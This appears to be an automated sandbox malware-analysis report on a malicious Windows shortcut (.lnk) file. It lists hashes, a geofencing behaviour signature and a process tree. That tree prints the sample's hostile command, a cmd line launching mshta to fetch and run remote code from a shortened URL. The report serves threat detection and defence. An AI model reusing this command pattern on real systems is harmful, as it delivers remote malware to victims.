Analysis

max time kernel: 138s
max time network: 186s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 20-05-2022 13:59
Behavioral task: behavioral1
Sample: d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805.lnk
Resource: win7-20220414-en

Behavioral task: behavioral2
Sample: d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805.lnk
Resource: win10v2004-20220414-en
General

Target: d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805.lnk
Size: 1.2MB
MD5: 365d95c0d0659a1081488460eadf8159
SHA1: 63a3f87be4f037585f576599823557e5444084a4
SHA256: d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805
SHA512: 41c49560683ee1611eb1143ca6babe650e336c33f7d58b67cb34e17e0450a9ef6b212fc318bc3601942e49acc3ba65aba86278bb6a60ac0764b9488036a4ca4a
Malware Config

Extracted: https://bit.ly/3eIxLAZ
Signatures

Blocklisted process makes network request (6 IoCs)
Processes: mshta.exe
  flow  pid   process
  8     3108  mshta.exe
  11    3108  mshta.exe
  23    3108  mshta.exe
  37    3108  mshta.exe
  38    3108  mshta.exe
  39    3108  mshta.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes: cmd.exe
  description        ioc                                                                                                process
  Key value queried  \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation  cmd.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious use of WriteProcessMemory (4 IoCs)
Processes: cmd.exe, cmd.exe
  description                       pid   process  target process
  PID 2428 wrote to memory of 4104  2428  cmd.exe  cmd.exe
  PID 2428 wrote to memory of 4104  2428  cmd.exe  cmd.exe
  PID 4104 wrote to memory of 3108  4104  cmd.exe  mshta.exe
  PID 4104 wrote to memory of 3108  4104  cmd.exe  mshta.exe
Processes

Depth 1: C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  Depth 2: C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://bit.ly/3eIxLAZ
    - Suspicious use of WriteProcessMemory

    Depth 3: C:\Windows\System32\mshta.exe
      C:\Windows\System32\mshta https://bit.ly/3eIxLAZ
      - Blocklisted process makes network request